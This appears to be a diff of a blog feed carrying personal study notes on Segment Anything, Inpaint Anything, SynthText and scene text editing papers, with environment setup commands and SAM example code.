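The error message itself suggests a workaround: cap the allocator's split size. A minimal sketch of that, where the value 128 is an assumption to tune, and the variable must be set before the first CUDA allocation (safest: before importing torch):

import os
os.environ["PYTORCH_CUDA_ALLOC_CONF"] = "max_split_size_mb:128"  # assumed value; tune for your GPU

import torch  # imported after setting the variable so the CUDA allocator picks it up
print(torch.cuda.is_available())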
    ]]>
+ Resources

Notes

png

Illustration of Inpaint Anything. Users can select any object in an image by clicking on it. With powerful vision models such as SAM [7], LaMa [13], and Stable Diffusion (SD) [11], Inpaint Anything can smoothly remove the object (i.e., Remove Anything). Further, prompted with text, users can fill the object with any desired content (i.e., Fill Anything) or arbitrarily replace the object's background (i.e., Replace Anything).


• Modern image inpainting systems often struggle with mask selection and hole filling.
• The paper attempts mask-free image inpainting and proposes a new "click-and-fill" paradigm called Inpaint Anything (IA), which supports three main functions:
  • Remove Anything: the user clicks any object and IA removes it, filling in the background
    • SAM + SOTA
      • SAM has demonstrated promising segmentation capabilities in a wide variety of scenarios and shows the great potential of foundation models for computer vision. It is a breakthrough step toward visual artificial general intelligence, and SAM has been hailed as "the ChatGPT of CV".
      • Studies LaMa [13], a simple single-stage method for mask-based inpainting that combines fast Fourier convolutions (FFCs) [1], a perceptual loss [6], and an aggressive training-mask generation strategy to reproduce repetitive visual structures well.
  • Fill Anything: the user gives IA a text prompt, and IA drives an AIGC model such as Stable Diffusion to replace the object with the corresponding generated content
    • SAM + AIGC
    • Uses a powerful AIGC Stable Diffusion [11] model to generate the desired content in the hole from a text prompt
  • Replace Anything: the user keeps the clicked object and has IA replace the remaining background with newly generated content

Code

Setting up the environment

Since a segment-anything environment was already set up, clone it:

conda create -n inpaint-anything --clone segment-anything

Download the code from geekyutao/Inpaint-Anything: Inpaint anything using Segment Anything and inpainting models. (github.com):

png

In the repository directory:

python -m pip install -e segment_anything

A huge pile of packages... this thing is so slow!

python -m pip install -r lama/requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

Download the pretrained models sam_vit_h_4b8939.pth and big-lama (the latter is on a Russian file-hosting site; registering took forever, what a pain), and put them in ./pretrained_models

png

Run the example command in PyCharm's terminal:

python fill_anything.py --input_img ./example/remove-anything/dog.jpg  --point_coords 750 500  --point_labels 1  --text_prompt "a teddy bear on a bench" --dilate_kernel_size 15  --output_dir ./results --sam_model_type "vit_h" --sam_ckpt ./pretrained_models/sam_vit_h_4b8939.pth

Another pile of downloads; just wait.

png

It says I'm out of VRAM. Game over!

torch.cuda.OutOfMemoryError: CUDA out of memory. Tried to allocate 640.00 MiB (GPU 0; 8.00 GiB total capacity; 6.16 GiB already allocated; 0 bytes free; 6.66 GiB reserved in total by PyTorch) If reserved memory is >> allocated memory try setting max_split_size_mb to avoid fragmentation
pip install git+https://github.com/openai/CLIP.git
    ]]>
@@ -7175,7 +7175,7 @@ /posts/Paper-Segment%20Anything/ - Resources

Notes

• Introduces the Segment Anything project

• Builds the largest dataset to date: 1B masks and 11M images


Goal: build a foundation model for image segmentation, i.e., develop a promptable model and pre-train it on a broad dataset with a task that enables powerful generalization

png

The plan's success hinges on three components:

• What task enables zero-shot generalization?
  • Use the promptable segmentation task as the pre-training objective, and solve general downstream segmentation tasks via prompt engineering.
    • The promptable segmentation task suggests a natural pre-training algorithm that simulates a sequence of prompts (points, boxes, masks) for each training sample
      • Perform edge detection
      • Segment everything, i.e., generate object proposals
      • Segment detected objects, i.e., instance segmentation
      • As a proof of concept, segment objects from free-form text
• What is the corresponding model architecture? The Segment Anything Model (SAM), with three constraints
  • A powerful image encoder computes an image embedding
    • An MAE pre-trained Vision Transformer (ViT)
  • A prompt encoder embeds prompts
    • Two sets of prompts are considered: sparse (points, boxes, text) and dense (masks); points and boxes are represented by positional encodings summed with learned embeddings for each prompt type, and free-form text by the off-the-shelf text encoder from CLIP
  • The two information sources are combined in a lightweight mask decoder that predicts segmentation masks
    • It efficiently maps the image embedding, prompt embeddings, and an output token to a mask
• What data can power this task and model?
  • The data engine has three stages:
    • Assisted-manual: SAM assists annotators in annotating masks
      • Similar to classic interactive segmentation (like Photoshop?)
    • Semi-automatic: SAM automatically generates masks for a subset of objects by prompting it with likely object locations
      • Annotators are shown images pre-filled with these masks and asked to annotate any remaining unannotated objects
    • Fully automatic: SAM is prompted with a regular grid of foreground points, yielding on average ~100 high-quality masks per image
  • Dataset: SA-1B
    • 11× more images and 400× more masks than Open Images, the largest existing dataset
    • 11M images, averaging 3300 × 4950 pixels
    • 1B masks, 99.1% automatically generated, verified to have high IoU and good quality
    • Responsible AI (RAI): the dataset's images are geographically balanced across the world

Code

Setting up the environment

Create a new conda environment:

conda create -n segment-anything python=3.9

Install PyTorch offline (after getting burned n times I've gradually gotten the hang of it orz; offline installation just works better): download the matching versions of torch and torchvision from download.pytorch.org/whl/torch_stable.html:

png

conda activate segment-anything

Change into the download directory:

pip install torch-1.13.1+cu117-cp39-cp39-win_amd64.whl
pip install torchvision-0.14.1+cu117-cp39-cp39-win_amd64.whl

Download the code from facebookresearch/segment-anything: The repository provides code for running inference with the SegmentAnything Model (SAM), links for downloading the trained model checkpoints, and example notebooks that show how to use the model. (github.com):

png

In the root of the downloaded repository, install segment-anything:

pip install -e .

Download the pretrained model sam_vit_h_4b8939.pth (the ViT-H SAM model) and put it in the repository root as well:

Other models can also be chosen, of course:

png

Run!

1. Import the libraries

import torch
import torchvision
print("PyTorch version:", torch.__version__)
print("Torchvision version:", torchvision.__version__)
print("CUDA is available:", torch.cuda.is_available())
PyTorch version: 1.13.1+cu117
Torchvision version: 0.14.1+cu117
CUDA is available: True
import numpy as np
import torch
import matplotlib.pyplot as plt
import cv2

import sys
sys.path.append("..")
from segment_anything import sam_model_registry, SamAutomaticMaskGenerator, SamPredictor

# prevent the kernel from crashing when using matplotlib
import os
os.environ["KMP_DUPLICATE_LIB_OK"]="TRUE"

2. Read the image to segment

    image = cv2.imread('images/chess.jpg')
    image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
    plt.figure(figsize=(10,10))
    plt.imshow(image)
    plt.axis('off')
    plt.show()

    png

3. Load the segmentation model

    sam_checkpoint = "../sam_vit_h_4b8939.pth"
    model_type = "vit_h"

    device = "cuda"

    sam = sam_model_registry[model_type](checkpoint=sam_checkpoint)
    sam.to(device=device)

4. Set the parameters

Automatic mask generation has several tunable parameters that control how densely points are sampled and the thresholds for removing low-quality or duplicate masks.
In addition, generation can run automatically on crops of the image to improve performance on smaller objects, and post-processing can remove stray pixels and holes. An example configuration that samples more masks: https://github.com/facebookresearch/segment-anything/blob/9e1eb9fdbc4bca4cd0d948b8ae7fe505d9f4ebc7/segment_anything/automatic_mask_generator.py#L35
Re-run the command below with a few different settings, e.g. iou_thresh from 0.86 to 0.9 and score_thresh from 0.92 to 0.96.

Use the SAM model to generate masks for the entire image: generate a grid of point prompts over the image, then filter out low-quality and duplicate masks. The default setup uses SAM with a ViT-H backbone:

SamAutomaticMaskGenerator() parameters:

• model (Sam): the SAM model used for mask prediction.

• points_per_side (int or None): the number of points sampled along one side of the image; the total number of points is points_per_side**2. If None, point_grids must supply explicit point sampling.

• points_per_batch (int): how many points the model runs simultaneously. Higher numbers may be faster but use more GPU memory.

• pred_iou_thresh (float): a filtering threshold in [0,1] using the model's predicted mask quality.

• stability_score_thresh (float): a filtering threshold in [0,1] using the stability of a mask under changes to the cutoff used to binarize the model's mask predictions.

• stability_score_offset (float): the amount to offset the cutoff when computing the stability score.

• box_nms_thresh (float): the box IoU cutoff used by non-maximum suppression to filter duplicate masks.

• crops_n_layers (int): if >0, mask prediction is run again on crops of the image. Sets the number of layers to run, where each layer has 2**i_layer image crops.

• crops_nms_thresh (float): the box IoU cutoff used by non-maximum suppression to filter duplicate masks between different crops.

• crop_overlap_ratio (float): sets the degree to which crops overlap. In the first crop layer, crops overlap by this fraction of the image length; later layers with more crops scale this overlap down.

• crop_n_points_downscale_factor (int): the number of points-per-side sampled in layer n is scaled down by crop_n_points_downscale_factor**n.

• point_grids (list(np.ndarray) or None): a list of explicit grids of points used for sampling, normalized to [0,1]. The nth grid in the list is used in the nth crop layer; exclusive with points_per_side.

• min_mask_region_area (int): if >0, post-processing is applied to remove disconnected regions and holes in masks with area smaller than min_mask_region_area. Requires opencv.

• output_mode (str): the form masks are returned in. Can be binary_mask, uncompressed_rle, or coco_rle; coco_rle requires pycocotools. For large resolutions, binary_mask may consume large amounts of memory.

mask_generator_ = SamAutomaticMaskGenerator(
    model=sam,
    points_per_side=64,
    pred_iou_thresh=0.98,
    stability_score_thresh=0.96,
    crop_n_layers=1,
    crop_n_points_downscale_factor=2,
    min_mask_region_area=100,  # Requires open-cv to run post-processing
)

5. Segment

masks = mask_generator_.generate(image)
print(len(masks))  # number of masks generated
55

Mask generation returns a list over masks, where each mask is a dict containing various data about the mask. The keys are (a quick inspection snippet follows the list):

• segmentation: the mask
• area: the mask's area in pixels
• bbox: the mask's boundary box in XYWH format
• predicted_iou: the model's own prediction of the mask's quality
• point_coords: the sampled input point that generated this mask
• stability_score: an additional measure of mask quality
• crop_box: the crop of the image used to generate this mask, in XYWH format
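A quick way to sanity-check these fields, using only the keys listed above:

# print bounding box, pixel area, and predicted quality of the five largest masks
top = sorted(masks, key=lambda m: m['area'], reverse=True)[:5]
for m in top:
    print(m['bbox'], m['area'], round(m['predicted_iou'], 3))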
def show_anns(anns):
    if len(anns) == 0:
        return
    sorted_anns = sorted(anns, key=(lambda x: x['area']), reverse=True)
    # plt.gca() returns the current Axes object, which lets us adjust axis
    # ranges, labels, and ticks on the figure drawn by plt.imshow below.
    ax = plt.gca()
    ax.set_autoscale_on(False)
    for ann in sorted_anns:
        m = ann['segmentation']  # the boolean mask
        img = np.ones((m.shape[0], m.shape[1], 3))
        color_mask = np.random.random((1, 3)).tolist()[0]
        for i in range(3):  # assign a random color to this mask
            img[:, :, i] = color_mask[i]
        # np.dstack stacks the color image with m * 0.35 along the third axis,
        # turning the mask into the alpha channel of an RGBA image; ax.imshow
        # then draws each mask as a translucent colored overlay.
        ax.imshow(np.dstack((img, m * 0.35)))

plt.figure(figsize=(10, 10))
plt.imshow(image)
show_anns(masks)
plt.axis('off')
plt.show()
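Besides automatic generation, SAM can also be prompted directly through SamPredictor from the same segment_anything package. A minimal sketch; the click coordinates here are made up:

from segment_anything import SamPredictor
import numpy as np

predictor = SamPredictor(sam)   # reuse the sam model loaded above
predictor.set_image(image)      # compute the image embedding once per image

point_coords = np.array([[500, 375]])  # hypothetical (x, y) foreground click
point_labels = np.array([1])           # 1 = foreground, 0 = background

masks_p, scores, logits = predictor.predict(
    point_coords=point_coords,
    point_labels=point_labels,
    multimask_output=True,  # return 3 candidate masks for the ambiguous prompt
)
print(masks_p.shape, scores)  # (3, H, W) boolean masks with their quality scores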

    png

    ]]>
+ Resources

Notes

• Introduces the Segment Anything project

• Builds the largest dataset to date: 1B masks and 11M images


Goal: build a foundation model for image segmentation, i.e., develop a promptable model and pre-train it on a broad dataset with a task that enables powerful generalization

png

The plan's success hinges on three components:

• What task enables zero-shot generalization?
  • Use the promptable segmentation task as the pre-training objective, and solve general downstream segmentation tasks via prompt engineering.
    • The promptable segmentation task suggests a natural pre-training algorithm that simulates a sequence of prompts (points, boxes, masks) for each training sample
      • Perform edge detection
      • Segment everything, i.e., generate object proposals
      • Segment detected objects, i.e., instance segmentation
      • As a proof of concept, segment objects from free-form text
• What is the corresponding model architecture? The Segment Anything Model (SAM), with three constraints
  • A powerful image encoder computes an image embedding
    • An MAE pre-trained Vision Transformer (ViT)
  • A prompt encoder embeds prompts
    • Two sets of prompts are considered: sparse (points, boxes, text) and dense (masks); points and boxes are represented by positional encodings summed with learned embeddings for each prompt type, and free-form text by the off-the-shelf text encoder from CLIP
  • The two information sources are combined in a lightweight mask decoder that predicts segmentation masks
    • It efficiently maps the image embedding, prompt embeddings, and an output token to a mask
• What data can power this task and model?
  • The data engine has three stages:
    • Assisted-manual: SAM assists annotators in annotating masks
      • Similar to classic interactive segmentation (like Photoshop?)
    • Semi-automatic: SAM automatically generates masks for a subset of objects by prompting it with likely object locations
      • Annotators are shown images pre-filled with these masks and asked to annotate any remaining unannotated objects
    • Fully automatic: SAM is prompted with a regular grid of foreground points, yielding on average ~100 high-quality masks per image
  • Dataset: SA-1B
    • 11× more images and 400× more masks than Open Images, the largest existing dataset
    • 11M images, averaging 3300 × 4950 pixels
    • 1B masks, 99.1% automatically generated, verified to have high IoU and good quality
    • Responsible AI (RAI): the dataset's images are geographically balanced across the world

Code

Setting up the environment

Create a new conda environment:

conda create -n segment-anything python=3.9

Install PyTorch offline (after getting burned n times I've gradually gotten the hang of it orz; offline installation just works better): download the matching versions of torch and torchvision from download.pytorch.org/whl/torch_stable.html:

png

conda activate segment-anything

Change into the download directory:

pip install torch-1.13.1+cu117-cp39-cp39-win_amd64.whl
pip install torchvision-0.14.1+cu117-cp39-cp39-win_amd64.whl

Download the code from facebookresearch/segment-anything: The repository provides code for running inference with the SegmentAnything Model (SAM), links for downloading the trained model checkpoints, and example notebooks that show how to use the model. (github.com):

png

In the root of the downloaded repository, install segment-anything:

pip install -e .

Download the pretrained model sam_vit_h_4b8939.pth (the ViT-H SAM model) and put it in the repository root as well:

Other models can also be chosen, of course:

png

Run!

1. Import the libraries

import torch
import torchvision
print("PyTorch version:", torch.__version__)
print("Torchvision version:", torchvision.__version__)
print("CUDA is available:", torch.cuda.is_available())
PyTorch version: 1.13.1+cu117
Torchvision version: 0.14.1+cu117
CUDA is available: True
import numpy as np
import torch
import matplotlib.pyplot as plt
import cv2

import sys
sys.path.append("..")
from segment_anything import sam_model_registry, SamAutomaticMaskGenerator, SamPredictor

# prevent the kernel from crashing when using matplotlib
import os
os.environ["KMP_DUPLICATE_LIB_OK"]="TRUE"

2. Read the image to segment

image = cv2.imread('images/chess.jpg')
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
plt.figure(figsize=(10,10))
plt.imshow(image)
plt.axis('off')
plt.show()

png

3. Load the segmentation model

sam_checkpoint = "../sam_vit_h_4b8939.pth"
model_type = "vit_h"

device = "cuda"

sam = sam_model_registry[model_type](checkpoint=sam_checkpoint)
sam.to(device=device)

4. Set the parameters

Automatic mask generation has several tunable parameters that control how densely points are sampled and the thresholds for removing low-quality or duplicate masks.
In addition, generation can run automatically on crops of the image to improve performance on smaller objects, and post-processing can remove stray pixels and holes. An example configuration that samples more masks: https://github.com/facebookresearch/segment-anything/blob/9e1eb9fdbc4bca4cd0d948b8ae7fe505d9f4ebc7/segment_anything/automatic_mask_generator.py#L35
Re-run the command below with a few different settings, e.g. iou_thresh from 0.86 to 0.9 and score_thresh from 0.92 to 0.96.

Use the SAM model to generate masks for the entire image: generate a grid of point prompts over the image, then filter out low-quality and duplicate masks. The default setup uses SAM with a ViT-H backbone:

SamAutomaticMaskGenerator() parameters:

• model (Sam): the SAM model used for mask prediction.

• points_per_side (int or None): the number of points sampled along one side of the image; the total number of points is points_per_side**2. If None, point_grids must supply explicit point sampling.

• points_per_batch (int): how many points the model runs simultaneously. Higher numbers may be faster but use more GPU memory.

• pred_iou_thresh (float): a filtering threshold in [0,1] using the model's predicted mask quality.

• stability_score_thresh (float): a filtering threshold in [0,1] using the stability of a mask under changes to the cutoff used to binarize the model's mask predictions.

• stability_score_offset (float): the amount to offset the cutoff when computing the stability score.

• box_nms_thresh (float): the box IoU cutoff used by non-maximum suppression to filter duplicate masks.

• crops_n_layers (int): if >0, mask prediction is run again on crops of the image. Sets the number of layers to run, where each layer has 2**i_layer image crops.

• crops_nms_thresh (float): the box IoU cutoff used by non-maximum suppression to filter duplicate masks between different crops.

• crop_overlap_ratio (float): sets the degree to which crops overlap. In the first crop layer, crops overlap by this fraction of the image length; later layers with more crops scale this overlap down.

• crop_n_points_downscale_factor (int): the number of points-per-side sampled in layer n is scaled down by crop_n_points_downscale_factor**n.

• point_grids (list(np.ndarray) or None): a list of explicit grids of points used for sampling, normalized to [0,1]. The nth grid in the list is used in the nth crop layer; exclusive with points_per_side.

• min_mask_region_area (int): if >0, post-processing is applied to remove disconnected regions and holes in masks with area smaller than min_mask_region_area. Requires opencv.

• output_mode (str): the form masks are returned in. Can be binary_mask, uncompressed_rle, or coco_rle; coco_rle requires pycocotools. For large resolutions, binary_mask may consume large amounts of memory.

mask_generator_ = SamAutomaticMaskGenerator(
    model=sam,
    points_per_side=64,
    pred_iou_thresh=0.98,
    stability_score_thresh=0.96,
    crop_n_layers=1,
    crop_n_points_downscale_factor=2,
    min_mask_region_area=100,  # Requires open-cv to run post-processing
)

5. Segment

masks = mask_generator_.generate(image)
print(len(masks))  # number of masks generated
55

Mask generation returns a list over masks, where each mask is a dict containing various data about the mask. The keys are:

• segmentation: the mask
• area: the mask's area in pixels
• bbox: the mask's boundary box in XYWH format
• predicted_iou: the model's own prediction of the mask's quality
• point_coords: the sampled input point that generated this mask
• stability_score: an additional measure of mask quality
• crop_box: the crop of the image used to generate this mask, in XYWH format

def show_anns(anns):
    if len(anns) == 0:
        return
    sorted_anns = sorted(anns, key=(lambda x: x['area']), reverse=True)
    # plt.gca() returns the current Axes object, which lets us adjust axis
    # ranges, labels, and ticks on the figure drawn by plt.imshow below.
    ax = plt.gca()
    ax.set_autoscale_on(False)
    for ann in sorted_anns:
        m = ann['segmentation']  # the boolean mask
        img = np.ones((m.shape[0], m.shape[1], 3))
        color_mask = np.random.random((1, 3)).tolist()[0]
        for i in range(3):  # assign a random color to this mask
            img[:, :, i] = color_mask[i]
        # np.dstack stacks the color image with m * 0.35 along the third axis,
        # turning the mask into the alpha channel of an RGBA image; ax.imshow
        # then draws each mask as a translucent colored overlay.
        ax.imshow(np.dstack((img, m * 0.35)))

plt.figure(figsize=(10, 10))
plt.imshow(image)
show_anns(masks)
plt.axis('off')
plt.show()

    png

    ]]>
@@ -7206,7 +7206,7 @@ /posts/Paper-Synthetic%20Data%20for%20Text%20Localisation%20in%20Natural%20Images/ - Resources

Notes

This paper introduces a new method for detecting text in natural images. The method makes two contributions: first, a fast and scalable engine for generating synthetic images of text in cluttered natural background images; the engine overlays synthetic text onto existing background images in a natural way, accounting for the local 3D scene geometry. Second, the synthetic images are used to train a fully-convolutional neural network model for detecting and localizing text in natural images. (summary by ChatGPT)

Highlights:

• Proposes a fast, scalable engine for generating synthetic images of text in clutter, producing the SynthText in the Wild dataset.
• Trains a Fully-Convolutional Regression Network (FCRN) on the synthetic images, which efficiently performs text detection and bounding-box regression at all locations and multiple scales of an image.

Our synthetic engine is:

• realistic
• automated
• fast

Steps of the text generation pipeline:

1. Acquire suitable text and image samples
  • Text is sampled from the Newsgroup20 dataset in three ways: words, lines (up to 3 lines), and paragraphs (up to 7 lines)
  • 8,000 background images are scraped from Google Image Search, covering a variety of scenes; images containing text are discarded by manual inspection
2. Segment the image into contiguous regions based on local color and texture cues, and obtain a dense pixel-wise depth map using the CNN of [30]
  • Regions are obtained by thresholding the gPb-UCM contour hierarchy
3. Estimate a local surface normal for each suitable region
  • Fit a plane to it with RANSAC
4. Choose a color for the text, and optionally its outline, based on the region's color
  • Once the text's location and orientation are decided, it is assigned a color.
  • The text color palette is learned from cropped word images in the IIIT5K word dataset. The pixels in each cropped word image are partitioned into two groups with K-means, yielding a color pair, with one color approximating the foreground (text) color and the other the background. When rendering new text, the pair whose background color best matches the target image region (by L2-norm in Lab color space) is chosen, and its foreground color is used to render the text.
  • About 20% of text instances are randomly chosen to have a border. The border color is either the foreground color with its value channel increased or decreased, or the mean of the foreground and background colors.
5. Render the text with a randomly selected font and transform it according to the local surface orientation
6. Blend the text into the scene using Poisson image editing (a rough OpenCV sketch follows this list)
  • To preserve the illumination gradient in the synthetic text image, the text is blended onto the base image with the Poisson image editor [35], with the guidance field defined as in Eq. (12); Raskar's implementation solves this efficiently
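OpenCV ships a Poisson-blending implementation, so the blending step can be approximated as follows. This is a rough sketch under stated assumptions, not the paper's exact guidance field; the file names and paste location are placeholders:

import cv2
import numpy as np

bg = cv2.imread("background.jpg")                         # placeholder scene image
text_rgba = cv2.imread("text.png", cv2.IMREAD_UNCHANGED)  # rendered text with alpha

src = text_rgba[:, :, :3]
mask = text_rgba[:, :, 3]                                 # alpha channel as blend mask
center = (bg.shape[1] // 2, bg.shape[0] // 2)             # placeholder paste location

# Poisson (seamless) cloning preserves the background's illumination gradients,
# which is the point of step 6 above.
blended = cv2.seamlessClone(src, bg, mask, center, cv2.NORMAL_CLONE)
cv2.imwrite("blended.jpg", blended)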

Code

This project seems a bit old; it looks like it was written for Python 2.x... I set up a Python 3.9 environment anyway, and then spent forever patching the code orz

conda create -n SynthText python=3.9

Then install a pile of packages:

pygame==2.0.0, opencv (cv2), PIL (Image), numpy, matplotlib, h5py, scipy

Download some required files from Synthetic Data for Text Localisation in Natural Images - Academic Torrents


Hold on! I missed this sentence in the README.md:

The code in the master branch is for Python2. Python3 is supported in the python3 branch.

So I switched to ankush-me/SynthText at python3 (github.com) to download the code:

png

Aaaaargh, it won't run on Windows! I'll try it on a server some other day:

AttributeError: module 'signal' has no attribute 'SIGALRM'

    ]]>
+ Resources

Notes

This paper introduces a new method for detecting text in natural images. The method makes two contributions: first, a fast and scalable engine for generating synthetic images of text in cluttered natural background images; the engine overlays synthetic text onto existing background images in a natural way, accounting for the local 3D scene geometry. Second, the synthetic images are used to train a fully-convolutional neural network model for detecting and localizing text in natural images. (summary by ChatGPT)

Highlights:

• Proposes a fast, scalable engine for generating synthetic images of text in clutter, producing the SynthText in the Wild dataset.
• Trains a Fully-Convolutional Regression Network (FCRN) on the synthetic images, which efficiently performs text detection and bounding-box regression at all locations and multiple scales of an image.

Our synthetic engine is:

• realistic
• automated
• fast

Steps of the text generation pipeline:

1. Acquire suitable text and image samples
  • Text is sampled from the Newsgroup20 dataset in three ways: words, lines (up to 3 lines), and paragraphs (up to 7 lines)
  • 8,000 background images are scraped from Google Image Search, covering a variety of scenes; images containing text are discarded by manual inspection
2. Segment the image into contiguous regions based on local color and texture cues, and obtain a dense pixel-wise depth map using the CNN of [30]
  • Regions are obtained by thresholding the gPb-UCM contour hierarchy
3. Estimate a local surface normal for each suitable region
  • Fit a plane to it with RANSAC
4. Choose a color for the text, and optionally its outline, based on the region's color
  • Once the text's location and orientation are decided, it is assigned a color.
  • The text color palette is learned from cropped word images in the IIIT5K word dataset. The pixels in each cropped word image are partitioned into two groups with K-means, yielding a color pair, with one color approximating the foreground (text) color and the other the background. When rendering new text, the pair whose background color best matches the target image region (by L2-norm in Lab color space) is chosen, and its foreground color is used to render the text.
  • About 20% of text instances are randomly chosen to have a border. The border color is either the foreground color with its value channel increased or decreased, or the mean of the foreground and background colors.
5. Render the text with a randomly selected font and transform it according to the local surface orientation
6. Blend the text into the scene using Poisson image editing
  • To preserve the illumination gradient in the synthetic text image, the text is blended onto the base image with the Poisson image editor [35], with the guidance field defined as in Eq. (12); Raskar's implementation solves this efficiently

Code

This project seems a bit old; it looks like it was written for Python 2.x... I set up a Python 3.9 environment anyway, and then spent forever patching the code orz

conda create -n SynthText python=3.9

Then install a pile of packages:

pygame==2.0.0, opencv (cv2), PIL (Image), numpy, matplotlib, h5py, scipy

Download some required files from Synthetic Data for Text Localisation in Natural Images - Academic Torrents


Hold on! I missed this sentence in the README.md:

The code in the master branch is for Python2. Python3 is supported in the python3 branch.

So I switched to ankush-me/SynthText at python3 (github.com) to download the code:

png

Aaaaargh, it won't run on Windows! I'll try it on a server some other day:

AttributeError: module 'signal' has no attribute 'SIGALRM'

    ]]>
@@ -7291,7 +7291,7 @@ /posts/Plan-%E5%AF%B9%E8%AE%BA%E6%96%87%E7%9A%84%E7%9B%AE%E5%89%8D%E6%83%B3%E6%B3%95/ - Main body

png

The main idea at the moment is still the scene text editing problem: editing text in natural images while preserving the style of the background and the text. Papers on related work:

Editing Text in the Wild

Published in the ACM International Conference on Multimedia (MM), 2019, a CCF-recommended class-A international conference (computer graphics and multimedia).


Argues that scene text editing faces two major challenges: text style transfer and background texture preservation.

png

Proposes a style retention network for scene text, SRNet, which decomposes this complex task into several simpler, modular, jointly trainable sub-networks:


During training, SRNet takes a pair of images $(I_s,I_t)$ as input:

• $I_s$ is the source style image
• $I_t$ is the target text image

and outputs $((T_{sk},T_t),T_b,T_f)$:

• $T_{sk}$ is the target text skeleton
• $T_t$ is the foreground image with the same text style as $I_s$
• $T_b$ is the background
• $T_f$ is the final target text image

• Text conversion module (TCM)
  • Uses an FCN
    • Takes $(I_s,I_t)$ as input, encodes features with 3 down-sampling convolutional layers and 4 residual blocks, then concatenates the two feature maps along the depth axis
    • For decoding, 3 up-sampling transposed convolutional layers and 1 Convolution-BatchNorm-LeakyReLU block output $O_t$
  • Introduces a skeleton-guided learning mechanism to maintain the text skeleton in $I_t$ after transferring the text style from the source style image $I_s$: a skeleton response block consisting of 3 up-sampling layers and 1 convolutional layer, followed by a sigmoid activation, predicts a single-channel skeleton map
• Background inpainting module (BIM)
  • Follows the overall U-Net architecture with bottom-up feature fusion, erasing the original text-stroke pixels and filling in appropriate texture; takes $I_s$ as input and outputs the background image $O_b$
  • The input image is encoded by 3 down-sampling convolutional layers with stride 2, followed by 4 residual blocks
  • The decoder uses 3 up-sampling convolutional layers to produce an output image of the original size
  • Adds adversarial learning
• Fusion module
  • Learns how to effectively fuse the foreground information with the background texture to synthesize the edited text image
  • Follows an encoder-decoder FCN framework; the encoder consists of 3 down-sampling convolutional layers and residual blocks
  • The decoder generates the final edited image with Convolution-BatchNorm-LeakyReLU blocks
  • Adds adversarial learning
  • Introduces a VGG loss, combining a perceptual loss and a style loss, to reduce distortion and make the image more realistic (a sketch follows below)
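A minimal PyTorch sketch of such a VGG perceptual + style (Gram-matrix) loss, assuming torchvision is available; the layer indices are an assumption, not SRNet's exact configuration, and inputs are assumed already normalized to ImageNet statistics:

import torch
import torch.nn.functional as F
from torchvision.models import vgg19

class VGGLoss(torch.nn.Module):
    def __init__(self, layers=(3, 8, 17)):  # roughly relu1_2/relu2_2/relu3_4; assumed choice
        super().__init__()
        self.vgg = vgg19(pretrained=True).features.eval()  # newer torchvision prefers weights=
        for p in self.vgg.parameters():
            p.requires_grad_(False)
        self.layers = set(layers)

    def _feats(self, x):
        # collect intermediate activations at the chosen layers
        feats = []
        for i, layer in enumerate(self.vgg):
            x = layer(x)
            if i in self.layers:
                feats.append(x)
        return feats

    @staticmethod
    def _gram(f):
        # Gram matrix captures channel-wise feature correlations (style)
        b, c, h, w = f.shape
        f = f.view(b, c, h * w)
        return f @ f.transpose(1, 2) / (c * h * w)

    def forward(self, pred, target):
        fp, ft = self._feats(pred), self._feats(target)
        perceptual = sum(F.l1_loss(a, b) for a, b in zip(fp, ft))
        style = sum(F.l1_loss(self._gram(a), self._gram(b)) for a, b in zip(fp, ft))
        return perceptual + style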

SwapText: Image Based Texts Transfer in Scenes

Published in the IEEE Conference on Computer Vision and Pattern Recognition, 2020, a CCF-recommended class-A international conference (artificial intelligence).


png

Proposes a novel text swapping network, SwapText, which replaces the text in a scene text image while preserving the original style. Given a scene text image $I_s\in \mathbb R^{H\times W\times 3}$, the goal is to output $I_t\in\mathbb R^{H\times W\times 3}$, replacing the text while preserving the original style. It consists of three sub-networks:

• Text swapping network

  • First extracts style features from $I_s$ and content features from $I_c$, then combines the two with a self-attention network
  • Uses a CSTN to transform the content image $I_c$ according to the geometric attributes of the style image $I_s$
    • Inspired by the text-shape definitions used in text detection and recognition, the shape is represented by $2K$ fiducial points $P=\{p_1,p_2,\dots,p_{2K}\}$
    • The content image is transformed with a thin plate spline (TPS) module

  png

  • The style image and the transformed content image are encoded with 3 down-sampling convolutional layers and several residual blocks. To fully combine the style features $F_s$ and content features $F_c$, they are fed into a self-attention network to generate a feature map. During decoding, 3 up-sampling deconvolutional layers generate the foreground image $F_{cs}$.
• Background completion network

  • Reconstructs the original background image $I_b$ of image $I_s$; a GAN
• Fusion network

  • Fuses the outputs of the text swapping network and the background completion network to generate the final image $I_t$
  • Introduces a VGG loss

STEFANN: Scene Text Editor using Font Adaptive Neural Network

Published in the IEEE Conference on Computer Vision and Pattern Recognition, 2020, a CCF-recommended class-A international conference (artificial intelligence).


png

Proposes a character-level generative model, limiting the problem's complexity by restricting it to scene text with upper-case, non-overlapping characters. Steps:

• Preprocessing

  • Selection of the source character to be replaced

    • Uses the scene text detection algorithm EAST to roughly mark text regions, then manually selects polygon points to define the word's text region $\Omega$
  • Generation of the binary target character

    • Uses the MSER algorithm to detect a binary mask output $I_M$ for the individual characters appearing in region $\Omega$
    • The final binary image $I_c$ is obtained from the binarized image $I_B$ of $I$: $I_c(\mathbf{p})=\begin{cases}I_M(\mathbf{p})\odot I_B(\mathbf{p}) & \mathrm{if}\ \mathbf{p}\in\Omega \\ 0 & \mathrm{otherwise}\end{cases}$ (see the NumPy sketch after this list)
• FANnet

  • Takes two different inputs:
    • a $64\times 64$ source character image: 3 convolutional layers, then Flatten, then FC1
    • a one-hot encoding $\mathbf v$ of length $26$ for the target character: FC2
  • The last two FC layers output the other letters; applying Otsu thresholding yields the binary target image
• Colornet

  • Color transfer
    • CNN-based
    • Two inputs:
      • the color source character image
      • the binary target character image
  • Character placement
  • Removes the source character from $I$ and reconstructs the masked image with $W(I_b,\psi)$ so that the generated target character can be placed
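A small NumPy sketch of that masking equation, with array names following the notation above (shapes and dtypes are assumptions):

import numpy as np

def binary_target(I_M, I_B, omega):
    # I_M: MSER character mask, I_B: binarized input image,
    # omega: boolean mask of the selected word region; all HxW binary arrays.
    I_c = np.zeros_like(I_B)
    inside = omega.astype(bool)
    I_c[inside] = I_M[inside] & I_B[inside]  # element-wise product inside Omega, 0 elsewhere
    return I_c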

Ideas

UnrealText: Synthesizing Realistic Scene Text Images from the Unreal World

png

